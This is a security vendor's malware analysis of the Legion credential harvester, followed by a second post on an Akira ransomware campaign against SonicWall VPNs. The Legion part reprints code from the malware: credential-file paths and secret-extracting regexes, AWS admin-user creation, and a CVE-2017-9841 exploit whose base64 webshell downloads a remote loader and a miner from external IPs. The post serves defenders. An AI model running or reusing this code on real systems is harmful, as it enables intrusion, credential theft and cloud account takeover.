Blog
/
Cloud
/
April 13, 2023

Legion: An AWS Credential Harvester and SMTP Hijacker

Cado Security Labs researchers (now part of Darktrace) encountered Legion, an emerging Python-based credential harvester and hacktool. Legion exploits various services for the purpose of email abuse.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
The Darktrace Community
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
13
Apr 2023

Introduction

Cado Security Labs researchers (now part of Darktrace) encountered an emerging Python-based credential harvester and hacktool, named Legion, aimed at exploiting various services for the purpose of email abuse.  

The tool is sold via the Telegram messenger, and includes modules dedicated to:

  • enumerating vulnerable SMTP servers
  • conducting Remote Code Execution (RCE)
  • exploiting vulnerable versions of Apache
  • brute-forcing cPanel and WebHost Manager (WHM) accounts
  • interacting with Shodan’s API to retrieve a target list (provided you supply an API key)  
  • additional utilities, many of which involve abusing AWS services
Legion splash screen
Figure 1: Legion splash screen

The sample encountered by researchers appears to be related to another malware called AndroxGh0st [1]. At the time of writing, it had no detections on VirusTotal [2].

Screen
Figure 2: No open-source intelligence (OSINT) detections for legion.py.

Legion.py background

The sample itself is a rather long (21,015 line) Python3 script. Initial static analysis shows that the malware includes configurations for integrating with services such as Twilio and Shodan - more on this later. Telegram support is also included, with the ability to pipe the results of each of the modules into a Telegram chat via the Telegram Bot API.

  cfg['SETTINGS'] = {} 
  cfg['SETTINGS']['EMAIL_RECEIVER'] = 'put your email' 
  cfg['SETTINGS']['DEFAULT_TIMEOUT'] = '20' 
  cfg['TELEGRAM'] = {} 
  cfg['TELEGRAM']['TELEGRAM_RESULTS'] = 'on' 
  cfg['TELEGRAM']['BOT_TOKEN'] = 'bot token telegram' 
  cfg['TELEGRAM']['CHAT_ID'] = 'chat id telegram' 
  cfg['SHODAN'] = {} 
  cfg['SHODAN']['APIKEY'] = 'ADD YOUR SHODAN APIKEY' 
  cfg['TWILIO'] = {} 
  cfg['TWILIO']['TWILIOAPI'] = 'ADD YOUR TWILIO APIKEY' 
  cfg['TWILIO']['TWILIOTOKEN'] = 'ADD YOUR TWILIO AUTHTOKEN' 
  cfg['TWILIO']['TWILIOFROM'] = 'ADD YOUR FROM NUMBER' 
  cfg['SCRAPESTACK'] = {} 
  cfg['SCRAPESTACK']['SCRAPESTACK_KEY'] = 'scrapestack_key' 
  cfg['AWS'] = {} 
  cfg['AWS']['EMAIL'] = 'put your email AWS test' 

Legion.py - default configuration parameters

As mentioned above, the malware itself appears to be distributed via a public Telegram group. The sample also included references to a Telegram user with the handle “myl3gion”. At the time of writing, researchers accessed the Telegram group to determine whether additional information about the campaign could be discovered.  

Rather amusingly, one of the only recent messages was from the group owner warning members that the user myl3gion was in fact a scammer. There is no additional context to this claim, but it appears that the sample encountered was “illegitimately” circulated by this user.

Scam warning
Figure 3: Scam warning from Telegram group administrator

At the time of writing, the group had 1,090 members and the earliest messages were from February 2021.  

Researchers also encountered a YouTube channel named “Forza Tools”, which included a series of tutorial videos for using Legion. The fact that the developer behind the tool has made the effort of creating these videos, suggests that the tool is widely distributed and is likely paid malware.  

Forza tools youtube channel
Figure 4: Forza Tools YouTube Channel

Functionality

It’s clear from a cursory glance at the code, and from the YouTube tutorials described above, that the Legion credential harvester is primarily concerned with the exploitation of web servers running Content Management Systems (CMS), PHP, or PHP-based frameworks, such as Laravel.  

From these targeted servers, the tool uses a number of RegEx patterns to extract credentials for various web services. These include credentials for email providers, cloud service providers (i.e. AWS), server management systems, databases and payment systems - such as Stripe and PayPal. Typically, this type of tool would be used to hijack said services and use the infrastructure for mass spamming or opportunistic phishing campaigns.  

Additionally, the malware also includes code to implant webshells, brute-force CPanel or AWS accounts and send SMS messages to a list of dynamically-generated US mobile numbers.

Credential harvesting

Legion contains a number of methods for retrieving credentials from misconfigured web servers. Depending on the web server software, scripting language or framework the server is running, the malware will attempt to request resources known to contain secrets, parse them and save the secrets into results files sorted on a per-service basis.  

One such resource is the .env environment variables file, which often contains application-specific secrets for Laravel and other PHP-based web applications. The malware maintains a list of likely paths to this file, as well as similar files and directories for other web technologies. Examples of these can be seen in the table below.

Apache

/_profiler/phpinfo

/tool/view/phpinfo.view.php

/debug/default/view.html

/frontend/web/debug/default/view

/.aws/credentials

/config/aws.yml

/symfony/public/_profiler/phpinfo  

Laravel

/conf/.env

/wp-content/.env

/library/.env

/vendor/.env

/api/.env

/laravel/.env

/sites/all/libraries/mailchimp/.env

Generic debug paths

/debug/default/view?panel=config

/tool/view/phpinfo.view.php

/debug/default/view.html

/frontend/web/debug/default/view

/web/debug/default/view

/sapi/debug/default/view

/wp-config.php-backup

# grab password 
if 'DB_USERNAME=' in text: 
        method = './env' 
        db_user = re.findall("\nDB_USERNAME=(.*?)\n", text)[0] 
        db_pass = re.findall("\nDB_PASSWORD=(.*?)\n", text)[0] 
elif '<td>DB_USERNAME</td>' in text: 
        method = 'debug' 
        db_user = re.findall('<td>DB_USERNAME<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0] 
        db_pass = re.findall('<td>DB_PASSWORD<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0] 

Example of RegEx parsing code to retrieve database credentials from requested resources

if '<td>#TWILIO_SID</td>' in text: 
                  acc_sid = re.findall('<td>#TWILIO_SID<\\/td>\\s+<td><pre.*>(.*?)<\\/span>', text)[0] 
                  auhtoken = re.findall('<td>#TWILIO_AUTH<\\/td>\\s+<td><pre.*>(.*?)<\\/span>', text)[0] 
                  build = cleanit(url + '|' + acc_sid + '|' + auhtoken) 
                  remover = str(build).replace('\r', '') 
                  print(f"{yl}☆ [{gr}{ntime()}{red}] {fc}╾┄╼ {gr}TWILIO {fc}[{yl}{acc_sid}{res}:{fc}{acc_key}{fc}]") 
                  save = open(o_twilio, 'a') 
                  save.write(remover+'\n') 
                  save.close() 

Example of RegEx parsing code to retrieve Twilio secrets from requested resources

A full list of the services the malware attempts to extract credentials for can be seen in the table below.

Services targeted

  • Twilio
  • Nexmo
  • Stripe/Paypal (payment API function)
  • AWS console credentials
  • AWS SNS, S3 and SES specific credentials
  • Mailgun
  • Plivo
  • Clicksend
  • Mandrill
  • Mailjet
  • MessageBird
  • Vonage
  • Nexmo
  • Exotel
  • Onesignal
  • Clickatel
  • Tokbox
  • SMTP credentials
  • Database Administration and CMS credentials (CPanel, WHM, PHPmyadmin)

AWS features

As discussed in the previous section, Legion will attempt to retrieve credentials from insecure or misconfigured web servers. Of particular interest to those in cloud security is the malware’s ability to retrieve AWS credentials.  

Not only does the malware claim to harvest these from target sites, but it also includes a function dedicated to brute-forcing AWS credentials - named aws_generator().

def aws_generator(self, length, region): 
    chars = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","0","1","2","3","4","5","6","7","8","9","/","/"] 
    chars = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","0","1","2","3","4","5","6","7","8","9"] 
    def aws_id(): 
        output = "AKIA" 
        for i in range(16): 
            output += random.choice(chars[0:38]).upper() 
        return output 
    def aws_key(): 
        output = "" 
        for i in range(40): 
            if i == 0 or i == 39: 
                randUpper = random.choice(chars[0:38]).upper() 
                output += random.choice([randUpper, random.choice(chars[0:38])]) 
            else: 
                randUpper = random.choice(chars[0:38]).upper() 
                output += random.choice([randUpper, random.choice(chars)]) 
        return output 
    self.show_info_message(message="Generating Total %s Of AWS Key, Please Wait....." % length) 

Example of AWS credential generation code

This is consistent with external analysis of AndroxGh0st [1], which similarly concludes that it seems statistically unlikely this functionality would result in usable credentials. Similar code for brute-forcing SendGrid (an email marketing company) credentials is also included.

Regardless of how credentials are obtained, the malware attempts to add an IAM user with the hardcoded username of ses_legion. Interestingly, in this sample of Legion the malware also tags the created user with the key “Owner” and a hardcoded value of “ms.boharas”.

def create_new_user(iam_client, user_name='ses_legion'): 
        user = None 
        try: 
                user = iam_client.create_user( 
                        UserName=user_name, 
                        Tags=[{'Key': 'Owner', 'Value': 'ms.boharas'}] 
                    ) 
        except ClientError as e: 
                if e.response['Error']['Code'] == 'EntityAlreadyExists': 
                        result_str = get_random_string() 
                        user_name = 'ses_{}'.format(result_str) 
                        user = iam_client.create_user(UserName=user_name, 
                        Tags=[{'Key': 'Owner', 'Value': 'ms.boharas'}] 
                    ) 
        return user_name, user 

IAM user creation and tagging code

An IAM group named SESAdminGroup is then created and the newly created user is added. From there, Legion attempts to create a policy based on the Administrator Access [3] Amazon managed policy. This managed policy allows full access and can delegate permissions to all services and resources within AWS. This includes the management console, providing access has been activated for the user.

def creat_new_group(iam_client, group_name='SESAdminGroup'): 
        try: 
                res = iam_client.create_group(GroupName=group_name) 
        except ClientError as e: 
                if e.response['Error']['Code'] == 'EntityAlreadyExists': 
                        result_str = get_random_string() 
                        group_name = "SESAdminGroup{}".format(result_str) 
                        res = iam_client.create_group(GroupName=group_name) 
        return res['Group']['GroupName']
def creat_new_policy(iam_client, policy_name='AdministratorAccess'): policy_json = {"Version": "2012-10-17","Statement": [{"Effect": "Allow", "Action": "*","Resource": "*"}]} try: res = iam_client.create_policy( PolicyName=policy_name, PolicyDocument=json.dumps(policy_json) ) except ClientError as e: if e.response['Error']['Code'] == 'EntityAlreadyExists': result_str = get_random_string() policy_name = "AdministratorAccess{}".format(result_str) res = iam_client.create_policy(PolicyName=policy_name, PolicyDocument=json.dumps(policy_json) ) return res['Policy']['Arn'] 

IAM group and policy creation code

Consistent with the assumption that Legion is primarily concerned with cracking email services, the malware attempts to use the newly created AWS IAM user to query Amazon Simple Email Service (SES) quota limits and even send a test email.

def check(countsd, key, secret, region): 
        try: 
                out = '' 
                client = boto3.client('ses', aws_access_key_id=key, aws_secret_access_key=secret, region_name=region) 
                try: 
                        response = client.get_send_quota() 
                        frommail = client.list_identities()['Identities'] 
                        if frommail: 
                                SUBJECT = "AWS Checker By @mylegion (Only Private Tools)" 
                                BODY_TEXT = "Region: {region}\r\nLimit: {limit}|{maxsendrate}|{last24}\r\nLegion PRIV8 Tools\r\n".format(key=key, secret=secret, region=region, limit=response['Max24HourSend']) 
                                CHARSET = "UTF-8" 
                                _to = emailnow 

SMS hijacking capability

One feature of Legion not covered by previous research is the ability to deliver SMS spam messages to users of mobile networks in the US. To do this, the malware retrieves the area code for a US state of the user’s choosing from the website www.randomphonenumbers.com.  

To retrieve the area code, Legion uses Python’s BeautifulSoup HTML parsing library. A rudimentary number generator function is then used to build up a list of phone numbers to target.

def generate(self): 
    print('\n\n\t{0}╭╼[ {1}Starting Service {0}]\n\t│'.format(fg[5], fg[6])) 
    url = f'https://www.randomphonenumbers.com/US/random_{self.state}_phone_numbers'.replace(' ', '%20') 
    print('\t{0}│ [ {1}WEBSITE LOADED{0} ] {2}{3}{0}'.format(fg[5], fg[2], fg[1], url)) 
    query = requests.get(url) 
    soup = BeautifulSoup(query.text, 'html.parser') 
    list = soup.find_all('ul')[2] 
    urls = [] 
    for a in list.find_all('a', href=True): 
        url = f'https://www.randomphonenumbers.com{a["href"]}' 
        print('\t{0}│ [ {1}PARSING URLS{0}   ] {2}{3}'.format(fg[5], fg[2], fg[1], url), end='\r') 
        urls.append(url) 
        time.sleep(0.01) 
    print(' ' * 100, end='\r') 
    print('\t{0}│ [ {1}URLS PARSED{0}    ] {2}{3}\n\t│'.format(fg[5], fg[3], fg[1], len(urls)), end='\r')
def generate_number(area_code, carrier): for char in string.punctuation: carrier = carrier.replace(char, ' ') numbers = '' for number in [area_code + str(x) for x in range(0000, 9999)]: if len(number) != 10: gen = number.split(area_code)[1] number = area_code + str('0' * (10-len(area_code)-len(gen))) + gen numbers += number + '\n' with open(f'Generator/Carriers/{carrier}.txt', 'a+') as file: file.write(numbers)  

Web scraping and phone number generation code

To send the SMS messages themselves, the malware checks for saved SMTP credentials retrieved by one of the credential harvesting modules. Targeted carriers are listed below:

US Mobile Carriers

  • Alltel
  • Amp'd Mobile
  • AT&T
  • Boost Mobile
  • Cingular
  • Cricket
  • Einstein PCS
  • Sprint
  • SunCom
  • T-Mobile
  • VoiceStream
  • US Cellular
  • Verizon
  • Virgin
while not is_prompt: 
    print('\t{0}┌╼[{1}USA SMS Sender{0}]╾╼[{2}Choose Carrier to SPAM{0}]\n\t└─╼ '.format(fg[5], fg[0], fg[6]), end='') 
    try: 
        prompt = int(input('')) 
        if prompt in [int(x) for x in carriers.keys()]: 
            self.carrier = carriers[str(prompt)] 
            is_prompt = True 
        else: 
            print('\t{0}[{1}!{0}]╾╼[{2}Please enter a valid choice!{0}]'.format(fg[5], fg[0], fg[2]), end='\r') 
            time.sleep(1) 
    except ValueError: 
        print('\t{0}[{1}!{0}]╾╼[{2}Please enter a valid choice!{0}]'.format(fg[5], fg[0], fg[2]), end='\r') 
        time.sleep(1) 
print('\t{0}┌╼[{1}USA SMS Sender{0}]╾╼[{2}Please enter your message {0}| {2}160 Max Characters{0}]\n\t└─╼ '.format(fg[5], fg[0], fg[6]), end='') 
self.message = input('') 
print('\t{0}┌╼[{1}USA SMS Sender{0}]╾╼[{2}Please enter sender email{0}]\n\t└─╼ '.format(fg[5], fg[0], fg[6]), end='') 
self.sender_email = input('') 

Carrier selection code example

PHP exploitation

Not content with simply harvesting credentials for the purpose of email and SMS spamming, Legion also includes traditional hacktool functionality. One such feature is the ability to exploit well-known PHP vulnerabilities to register a webshell or remotely execute malicious code.

The malware uses several methods for this. One such method is posting a string preceded by <?php and including base64-encoded PHP code to the path "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php". This is a well-known PHP unauthenticated RCE vulnerability, tracked as CVE-2017-9841. It’s likely that Proof of Concept (PoC) code for this vulnerability was found online and integrated into the malware.

path = "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" 
url = url + path 
phpinfo = "<?php phpinfo(); ?>" 
try: 
    requester_1 = requests.post(url, data=phpinfo, timeout=15, verify=False) 
    if "phpinfo()" in requester_1.text: 
        payload_ = '<?php $root = $_SERVER["DOCUMENT_ROOT"]; $myfile = fopen($root . "/'+pathname+'", "w") or die("Unable to open file!"); $code = "PD9waHAgZWNobyAnPGNlbnRlcj48aDE+TEVHSU9OIEVYUExPSVQgVjQgKE7Eg3ZvZGFyaSBQb3dlcik8L2gxPicuJzxicj4nLidbdW5hbWVdICcucGhwX3VuYW1lKCkuJyBbL3VuYW1lXSAnO2VjaG8nPGZvcm0gbWV0aG9kPSJwb3N0ImVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiPic7ZWNobyc8aW5wdXQgdHlwZT0iZmlsZSJuYW1lPSJmaWxlIj48aW5wdXQgbmFtZT0iX3VwbCJ0eXBlPSJzdWJtaXQidmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7aWYoICRfUE9TVFsnX3VwbCddPT0iVXBsb2FkIil7aWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSl7ZWNobyc8Yj5MRUdJT04gRXhwbG9pdCBTdWNjZXNzITwvYj4nO31lbHNle2VjaG8nPGI+TEVHSU9OIEV4cGxvaXQgU3VjY2VzcyE8L2I+Jzt9fSBzeXN0ZW0oJ2N1cmwgLXMgLWsgMi41Ny4xMjIuMTEyL3JjZS9sb2FkIC1vIGFkaW5kZXgucGhwOyBjZCAvdG1wOyBjdXJsIC1PIDkxLjIxMC4xNjguODAvbWluZXIuanBnOyB0YXIgeHp2ZiBtaW5lci5qcGcgPiAvZGV2L251bGw7IHJtIC1yZiBtaW5lci5qcGc7IGNkIC54OyAuL3ggPiAvZGV2L251bGwnKTsKPz4="; fwrite($myfile, base64_decode($code)); fclose($myfile); echo("LEGION EXPLOIT V3"); ?>' 
        send_payload = requests.post(url, data=payload_, timeout=15, verify=False) 
        if "LEGION EXPLOIT V3" in send_payload.text: 
            status_exploit = "Successfully" 
        else: 
            status_exploit = "Can't exploit" 
    else: 
        status_exploit = "May not vulnerable"

Key takeaways

Legion is a general-purpose credential harvester and hacktool, designed to assist in compromising services for conducting spam operations via SMS and SMTP.  

Analysis of the Telegram groups in which this malware is advertised suggests a relatively wide distribution. Two groups monitored by Cado researchers had a combined total of 5,000 members. While not every member will have purchased a license for Legion, these numbers show that interest in such a tool is high. Related research indicates that there are a number of variants of this malware, likely with their own distribution channels.  

Throughout the analyzed code, researchers encountered several Indonesian-language comments, suggesting that the developer may either be Indonesian themselves or based in Indonesia. In a function dedicated to PHP exploitation, a link to a GitHub Gist leads to a user named Galeh Rizky. This user’s profile suggests that they are located in Indonesia, which ties in with the comments seen throughout the sample. It’s not clear whether Galeh Rizky is the developer behind Legion, or if their code just happens to be included in the sample.

Since this malware relies heavily on misconfigurations in web server technologies and frameworks such as Laravel, it’s recommended that users of these technologies review their existing security processes and ensure that secrets are appropriately stored. Ideally, if credentials are to be stored in a .env file, this should be stored outside web server directories so that it’s inaccessible from the web.  

For best practices on investigating and responding to threats in AWS cloud environments, check out our Ultimate Guide to Incident Response in AWS.

Indicators of compromise (IoCs)

Filename SHA256

legion.py fcd95a68cd8db0199e2dd7d1ecc4b7626532681b41654519463366e27f54e65a

legion.py (variant) 42109b61cfe2e1423b6f78c093c3411989838085d7e6a5f319c6e77b3cc462f3

User agents

Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36

Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50

Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36

Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36  

References

  1. https://www.fortinet.com/products/forticnapp
  2. https://www.virustotal.com/gui/file/fcd95a68cd8db0199e2dd7d1ecc4b7626532681b41654519463366e27f54e65a
  3. https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_job-functions.html
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
The Darktrace Community

More in this series

No items found.

Blog

/

Network

/

October 9, 2025

Inside Akira’s SonicWall Campaign: Darktrace’s Detection and Response

akira sonicwallDefault blog imageDefault blog image

Introduction: Background on Akira SonicWall campaign

Between July and August 2025, security teams worldwide observed a surge in Akira ransomware incidents involving SonicWall SSL VPN devices [1]. Initially believed to be the result of an unknown zero-day vulnerability, SonicWall later released an advisory announcing that the activity was strongly linked to a previously disclosed vulnerability, CVE-2024-40766, first identified over a year earlier [2].

On August 20, 2025, Darktrace observed unusual activity on the network of a customer in the US. Darktrace detected a range of suspicious activity, including network scanning and reconnaissance, lateral movement, privilege escalation, and data exfiltration. One of the compromised devices was later identified as a SonicWall virtual private network (VPN) server, suggesting that the incident was part of the broader Akira ransomware campaign targeting SonicWall technology.

As the customer was subscribed to the Managed Detection and Response (MDR) service, Darktrace’s Security Operations Centre (SOC) team was able to rapidly triage critical alerts, restrict the activity of affected devices, and notify the customer of the threat. As a result, the impact of the attack was limited - approximately 2 GiB of data had been observed leaving the network, but any further escalation of malicious activity was stopped.

Threat Overview

CVE-2024-40766 and other misconfigurations

CVE-2024-40766 is an improper access control vulnerability in SonicWall’s SonicOS, affecting Gen 5, Gen 6, and Gen 7 devices running SonicOS version 7.0.1 5035 and earlier [3]. The vulnerability was disclosed on August 23, 2024, with a patch released the same day. Shortly after, it was reported to be exploited in the wild by Akira ransomware affiliates and others [4].

Almost a year later, the same vulnerability is being actively targeted again by the Akira ransomware group. In addition to exploiting unpatched devices affected by CVE-2024-40766, security researchers have identified three other risks potentially being leveraged by the group [5]:

*The Virtual Office Portal can be used to initially set up MFA/TOTP configurations for SSLVPN users.

Thus, even if SonicWall devices were patched, threat actors could still target them for initial access by reusing previously stolen credentials and exploiting other misconfigurations.

Akira Ransomware

Akira ransomware was first observed in the wild in March 2023 and has since become one of the most prolific ransomware strains across the threat landscape [6]. The group operates under a Ransomware-as-a-Service (RaaS) model and frequently uses double extortion tactics, pressuring victims to pay not only to decrypt files but also to prevent the public release of sensitive exfiltrated data.

The ransomware initially targeted Windows systems, but a Linux variant was later observed targeting VMware ESXi virtual machines [7]. In 2024, it was assessed that Akira would continue to target ESXi hypervisors, making attacks highly disruptive due to the central role of virtualisation in large-scale cloud deployments. Encrypting the ESXi file system enables rapid and widespread encryption with minimal lateral movement or credential theft. The lack of comprehensive security protections on many ESXi hypervisors also makes them an attractive target for ransomware operators [8].

Victimology

Akira is known to target organizations across multiple sectors, most notably those in manufacturing, education, and healthcare. These targets span multiple geographic regions, including North America, Latin America, Europe and Asia-Pacific [9].

Geographical distribution of organization’s affected by Akira ransomware in 2025 [9].
Figure 1: Geographical distribution of organization’s affected by Akira ransomware in 2025 [9].

Common Tactics, Techniques and Procedures (TTPs) [7][10]

Initial Access
Targets remote access services such as RDP and VPN through vulnerability exploitation or stolen credentials.

Reconnaissance
Uses network scanning tools like SoftPerfect and Advanced IP Scanner to map the environment and identify targets.

Lateral Movement
Moves laterally using legitimate administrative tools, typically via RDP.

Persistence
Employs techniques such as Kerberoasting and pass-the-hash, and tools like Mimikatz to extract credentials. Known to create new domain accounts to maintain access.

Command and Control
Utilizes remote access tools including AnyDesk, RustDesk, Ngrok, and Cloudflare Tunnel.

Exfiltration
Uses tools such as FileZilla, WinRAR, WinSCP, and Rclone. Data is exfiltrated via protocols like FTP and SFTP, or through cloud storage services such as Mega.

Darktrace’s Coverage of Akira ransomware

Reconnaissance

Darktrace first detected of unusual network activity around 05:10 UTC, when a desktop device was observed performing a network scan and making an unusual number of DCE-RPC requests to the endpoint mapper (epmapper) service. Network scans are typically used to identify open ports, while querying the epmapper service can reveal exposed RPC services on the network.

Multiple other devices were also later seen with similar reconnaissance activity, and use of the Advanced IP Scanner tool, indicated by connections to the domain advanced-ip-scanner[.]com.

Lateral movement

Shortly after the initial reconnaissance, the same desktop device exhibited unusual use of administrative tools. Darktrace observed the user agent “Ruby WinRM Client” and the URI “/wsman” as the device initiated a rare outbound Windows Remote Management (WinRM) connection to two domain controllers (REDACTED-dc1 and REDACTED-dc2). WinRM is a Microsoft service that uses the WS-Management (WSMan) protocol to enable remote management and control of network devices.

Darktrace also observed the desktop device connecting to an ESXi device (REDACTED-esxi1) via RDP using an LDAP service credential, likely with administrative privileges.

Credential access

At around 06:26 UTC, the desktop device was seen fetching an Active Directory certificate from the domain controller (REDACTED-dc1) by making a DCE-RPC request to the ICertPassage service. Shortly after, the device made a Kerberos login using the administrative credential.

Figure 3: Darktrace’s detection of the of anomalous certificate download and subsequent Kerberos login.

Further investigation into the device’s event logs revealed a chain of connections that Darktrace’s researchers believe demonstrates a credential access technique known as “UnPAC the hash.”

This method begins with pre-authentication using Kerberos’ Public Key Cryptography for Initial Authentication (PKINIT), allowing the client to use an X.509 certificate to obtain a Ticket Granting Ticket (TGT) from the Key Distribution Center (KDC) instead of a password.

The next stage involves User-to-User (U2U) authentication when requesting a Service Ticket (ST) from the KDC. Within Darktrace's visibility of this traffic, U2U was indicated by the client and service principal names within the ST request being identical. Because PKINIT was used earlier, the returned ST contains the NTLM hash of the credential, which can then be extracted and abused for lateral movement or privilege escalation [11].

Flowchart of Kerberos PKINIT pre-authentication and U2U authentication [12].
Figure 4: Flowchart of Kerberos PKINIT pre-authentication and U2U authentication [12].
Figure 5: Device event log showing the Kerberos Login and Kerberos Ticket events.

Analysis of the desktop device’s event logs revealed a repeated sequence of suspicious activity across multiple credentials. Each sequence included a DCE-RPC ICertPassage request to download a certificate, followed by a Kerberos login event indicating PKINIT pre-authentication, and then a Kerberos ticket event consistent with User-to-User (U2U) authentication.

Darktrace identified this pattern as highly unusual. Cyber AI Analyst determined that the device used at least 15 different credentials for Kerberos logins over the course of the attack.

By compromising multiple credentials, the threat actor likely aimed to escalate privileges and facilitate further malicious activity, including lateral movement. One of the credentials obtained via the “UnPAC the hash” technique was later observed being used in an RDP session to the domain controller (REDACTED-dc2).

C2 / Additional tooling

At 06:44 UTC, the domain controller (REDACTED-dc2) was observed initiating a connection to temp[.]sh, a temporary cloud hosting service. Open-source intelligence (OSINT) reporting indicates that this service is commonly used by threat actors to host and distribute malicious payloads, including ransomware [13].

Shortly afterward, the ESXi device was observed downloading an executable named “vmwaretools” from the rare external endpoint 137.184.243[.]69, using the user agent “Wget.” The repeated outbound connections to this IP suggest potential command-and-control (C2) activity.

Cyber AI Analyst investigation into the suspicious file download and suspected C2 activity between the ESXI device and the external endpoint 137.184.243[.]69.
Figure 6: Cyber AI Analyst investigation into the suspicious file download and suspected C2 activity between the ESXI device and the external endpoint 137.184.243[.]69.
Packet capture (PCAP) of connections between the ESXi device and 137.184.243[.]69.
Figure 7: Packet capture (PCAP) of connections between the ESXi device and 137.184.243[.]69.

Data exfiltration

The first signs of data exfiltration were observed at around 7:00 UTC. Both the domain controller (REDACTED-dc2) and a likely SonicWall VPN device were seen uploading approximately 2 GB of data via SSH to the rare external endpoint 66.165.243[.]39 (AS29802 HVC-AS). OSINT sources have since identified this IP as an indicator of compromise (IoC) associated with the Akira ransomware group, known to use it for data exfiltration [14].

Cyber AI Analyst incident view highlighting multiple unusual events across several devices on August 20. Notably, it includes the “Unusual External Data Transfer” event, which corresponds to the anomalous 2 GB data upload to the known Akira-associated endpoint 66.165.243[.]39.
Figure 8: Cyber AI Analyst incident view highlighting multiple unusual events across several devices on August 20. Notably, it includes the “Unusual External Data Transfer” event, which corresponds to the anomalous 2 GB data upload to the known Akira-associated endpoint 66.165.243[.]39.

Cyber AI Analyst

Throughout the course of the attack, Darktrace’s Cyber AI Analyst autonomously investigated the anomalous activity as it unfolded and correlated related events into a single, cohesive incident. Rather than treating each alert as isolated, Cyber AI Analyst linked them together to reveal the broader narrative of compromise. This holistic view enabled the customer to understand the full scope of the attack, including all associated activities and affected assets that might otherwise have been dismissed as unrelated.

Overview of Cyber AI Analyst’s investigation, correlating all related internal and external security events across affected devices into a single pane of glass.
Figure 9: Overview of Cyber AI Analyst’s investigation, correlating all related internal and external security events across affected devices into a single pane of glass.

Containing the attack

In response to the multiple anomalous activities observed across the network, Darktrace's Autonomous Response initiated targeted mitigation actions to contain the attack. These included:

  • Blocking connections to known malicious or rare external endpoints, such as 137.184.243[.]69, 66.165.243[.]39, and advanced-ip-scanner[.]com.
  • Blocking internal traffic to sensitive ports, including 88 (Kerberos), 3389 (RDP), and 49339 (DCE-RPC), to disrupt lateral movement and credential abuse.
  • Enforcing a block on all outgoing connections from affected devices to contain potential data exfiltration and C2 activity.
Autonomous Response actions taken by Darktrace on an affected device, including the blocking of malicious external endpoints and internal service ports.
Figure 10: Autonomous Response actions taken by Darktrace on an affected device, including the blocking of malicious external endpoints and internal service ports.

Managed Detection and Response

As this customer was an MDR subscriber, multiple Enhanced Monitoring alerts—high-fidelity models designed to detect activity indicative of compromise—were triggered across the network. These alerts prompted immediate investigation by Darktrace’s SOC team.

Upon determining that the activity was likely linked to an Akira ransomware attack, Darktrace analysts swiftly acted to contain the threat. At around 08:05 UTC, devices suspected of being compromised were quarantined, and the customer was promptly notified, enabling them to begin their own remediation procedures without delay.

A wider campaign?

Darktrace’s SOC and Threat Research teams identified at least three additional incidents likely linked to the same campaign. All targeted organizations were based in the US, spanning various industries, and each have indications of using SonicWall VPN, indicating it had likely been targeted for initial access.

Across these incidents, similar patterns emerged. In each case, a suspicious executable named “vmwaretools” was downloaded from the endpoint 85.239.52[.]96 using the user agent “Wget”, bearing some resemblance to the file downloads seen in the incident described here. Data exfiltration was also observed via SSH to the endpoints 107.155.69[.]42 and 107.155.93[.]154, both of which belong to the same ASN also seen in the incident described in this blog: S29802 HVC-AS. Notably, 107.155.93[.]154 has been reported in OSINT as an indicator associated with Akira ransomware activity [15]. Further recent Akira ransomware cases have been observed involving SonicWall VPN, where no similar executable file downloads were observed, but SSH exfiltration to the same ASN was. These overlapping and non-overlapping TTPs may reflect the blurring lines between different affiliates operating under the same RaaS.

Lessons from the campaign

This campaign by Akira ransomware actors underscores the critical importance of maintaining up-to-date patching practices. Threat actors continue to exploit previously disclosed vulnerabilities, not just zero-days, highlighting the need for ongoing vigilance even after patches are released. It also demonstrates how misconfigurations and overlooked weaknesses can be leveraged for initial access or privilege escalation, even in otherwise well-maintained environments.

Darktrace’s observations further reveal that ransomware actors are increasingly relying on legitimate administrative tools, such as WinRM, to blend in with normal network activity and evade detection. In addition to previously documented Kerberos-based credential access techniques like Kerberoasting and pass-the-hash, this campaign featured the use of UnPAC the hash to extract NTLM hashes via PKINIT and U2U authentication for lateral movement or privilege escalation.

